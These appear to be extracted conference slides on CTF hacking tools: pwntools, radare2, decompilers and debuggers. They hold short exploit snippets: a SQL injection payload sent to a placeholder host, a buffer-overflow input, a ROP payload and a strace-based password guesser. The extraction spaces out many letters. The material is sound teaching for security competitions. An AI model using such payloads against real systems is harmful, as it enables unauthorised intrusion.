A CTF Hackers Toolbox Grazer Linuxtage 2016

$ who

mike/@f0rki

@stefan2904

[email protected]

[email protected]

CS/InfoSec Student

CS/InfoSec/CI Student

CTF Player since 2010

CTF Player since 2014

CTF: Capture The Flag

Collaborative hacking competitions Teams vs. Teams

The goal is to capture flags

CTF{THIS_IS_A_FLAG}

CTF Type: Jeopardy

Figure: Sharif CTF Challenge Board

CTF Type: Attack-Defense

Figure: RUCTFe 2015 Network Schema (source: RUCTF org)

CTF Type: Attack-Defense

Figure: FAUST CTF 2015 scoreboard

Why CTFs?

It’s fun! Gain experience in Information Security Challenges modeled after real-world problems Sometimes real-world bugs modeled after CTF bugs?

LosFuzzys: A CTF Team in Graz

We Like Bugs!

LosFuzzys: A CTF Team in Graz

A group of people interested in information security Primarily CS/SW/ICE Students from TUGraz But we welcome anyone interested and motivated :) and maybe even you ;)

Irregular Meet-ups

Where to start?

Talk to us! :-) https://hack.more.systems twitter: @LosFuzzys Read writeups! Repo: github.com/ctfs Ours: hack.more.systems/writeups

CTF Toolbox

CTF Toolbox

Great diversity of challenges Some things turn up frequently Knowledge of technology necessary Experience helps a lot Using the right tools is essential assuming you know how to use them . . .

Scripting is your best Friend Be comfortable in automating things Use whatever works best bash, zsh etc. Python, Ruby etc.

Command-Line-Fu is very helpful

Standard utils – grep, sed, awk, sort, cut, uniq, . . . Network stuff – nc, socat, dig, nmap Query json – jq HTTP – curl ... Pipe together to get your results!

Bash Password Guessing

for x in q w e r t y u i o p a s d f g h j k l z \ x c v b n m QW E R T Y U I O P A S D F G H J \ K L Z X C V B N M 1 2 3 4 5 6 7 8 9 0 "−" "_" " ? " do e c h o "= $x =" # count s i g a c t i o n s y s c a l l s s t r a c e . / s t a g e 3 . b i n " D i d _ y o u _ l $ x $ x $ x $ x $ x $ x $ x $ x " 2>&1 \ | grep s i g a c t i o n \ | wc − l done > l o g # g e t h i g h e s t c o u n t o f s i g a c t i o n s and t r i g g e r i n g c h a r c a t l o g | g r e p −B 1 \ " $ ( c a t l o g | g r e p −v = | s o r t | u n i q | t a i l −n 1 ) "

Automated Browsing – python-requests

import requests URL = ’ h t t p : / / c t f . e x a m p l e . com ’ s = requests . session () r = s . p o s t (URL + ’ / l o g i n ’ , d a t a={ ’ u s e r ’ : ’ f u z z y ’ , ’ p a s s ’ :

’ 1234 ’ } )

# GET h t t p : / / c t f . e x a m p l e . com/ v u l n ? x =’ o r%201=1−−x r e s p = s . g e t (URL + ’ / v u l n ’ , params={ ’ x ’ : ’ \ ’ o r 1=1 −−x ’ } ) # s e s s i o n c o o k i e a u t o m a g i c a l l y used here print resp . text # f l a g { some_flag_of_some_service }

Dirty Networking – pwntools from pwn i m p o r t ∗ r = r e m o t e ( ’ c t f . e x a m p l e . com ’ , 1 3 3 7 ) # r. r. r.

l i n e based r e c v l i n e () s e n d l i n e ( ’HELO %s%s%s%s ’ ) r e c v u n t i l ( ’ 250 H e l l o ’ )

data = r . recv (4) # unpack LE u i n t 3 2 from b i n i = u32 ( d a t a ) l o g . i n f o ( ’ r e c e i v e d u i n t 3 2 {} ’ . f o r m a t ( i ) ) # pack BE u i n t 3 2 t o b i n r . s e n d ( p32 ( 1 0 9 4 7 9 5 5 8 5 , e n d i a n= ’ b i g ’ ) ) r . r e c v l i n e ()

Finding & Analyzing Vulnerabilities

Analyzing Java/.NET Apps

Great decompilers! Java/Dalvik bytecode intellij built-in decompiler (fernflower), procyon http://www.javadecompilers.com/

Android apps/Dalvik bytecode apktool, smali/baksmali, jadx Xposed

.NET bytecode ILSpy, Jetbrains dotPeek

A wild binary appears! $ f i l e . / pwn pwn : ELF 32− b i t LSB e x e c u t a b l e , I n t e l 8 0 3 8 6 , v e r s i o n 1 (GNU/ L i n u x ) , s t a t i c a l l y l i n k e d , f o r GNU/ L i n u x 2 . 6 . 2 4 , not s t r i p p e d

$ objdump -d ./pwn | less

Keep Calm And Use radare2 From git

radare2 – example commands

Search for functions containing "exec" afl~exec Show/search all strings in the file izz izz~FLAG Compute CRC32 over next 32 byte #crc32 32

Binary Decompilers

No really good open source binary decompilers :( The radare guys are working on one

Commercial/Closed-Source Hex-Rays/IDA Pro Decompiler ($$$) Hopper ($) retdec (free, webservice, no x86_64)

Debugging?

Debuggers

Use gdb with one of those: PEDA GEF pwndbg voltron gdb-dashboard

gdb alternatives: lldb, radare2 Newer debugging approaches qira rr

Pwning! $ mkfifo ./ f i f o $ . / pwn . / f i f o & p y t h o n −c ’ p r i n t ( "A" ∗ 4 1 2 8 ) ’ >> . / f i f o [ 1 ] 9391 The f i l e h a s been s a v e d s u c c e s s f u l l y [ 1 ] + 9391 s e g m e n t a t i o n f a u l t ( c o r e dumped ) . / pwn . / f i f o $ dmesg | t a i l −n 1 pwn [ 9 3 9 1 ] : s e g f a u l t a t 41414141 i p 0000000041414141 s p 00000000 f f b 6 d 3 4 0 e r r o r 14

pwntools again! from pwn i m p o r t ∗

# NOQA

v e l f = ELF ( " . / pwn" ) r = ROP( v e l f ) r . call (" exit " , [42]) p a y l o a d = "A" ∗ 4124 + s t r ( r ) # launch process vp = p r o c e s s ( [ " . / pwn" , " . / f i f o " ] ) gdb . a t t a c h ( vp ) # b r e a k ∗0 x 8 0 4 8 f 4 e w i t h open ( " . / f i f o " , "w" ) a s f : f . write ( payload ) # forward s t d i n / stdout to p r o c e s s s t d i n / stdout vp . i n t e r a c t i v e ( )

pwntools/binjitsu

I/O abstraction (called Tubes) ELF parser/info Return Oriented Programming (ROP) Shellcode plug’n’pwn shellcode builder

Binary data “parsing” ...

Cryptography

Crypto Tools

Pen & Paper sage CAS & python

packages implementing attacks, e.g. python-paddingoracle hashpumpy (hash length extension attack) ...

Learn to Improvise

Premature optimization* is the root of all evil! * also commenting code * also clean code

(only true for attack && during CTFs!) If it works once, . . . it works! Code-reuse between different CTFs! Post-CTF code cleanup would be good . . .

A fool with a tool is still a fool!

https://hack.more.systems

Thanks to all LosFuzzys members tuflowgraphy.at realraum IAIK

Writeups of Used Examples

https://hack.more.systems/writeups 9447ctf: premonition (web) NDH quals 2016: matriochka (reversing) NDH quals 2016: secure file reader (pwn)

don’t be eve!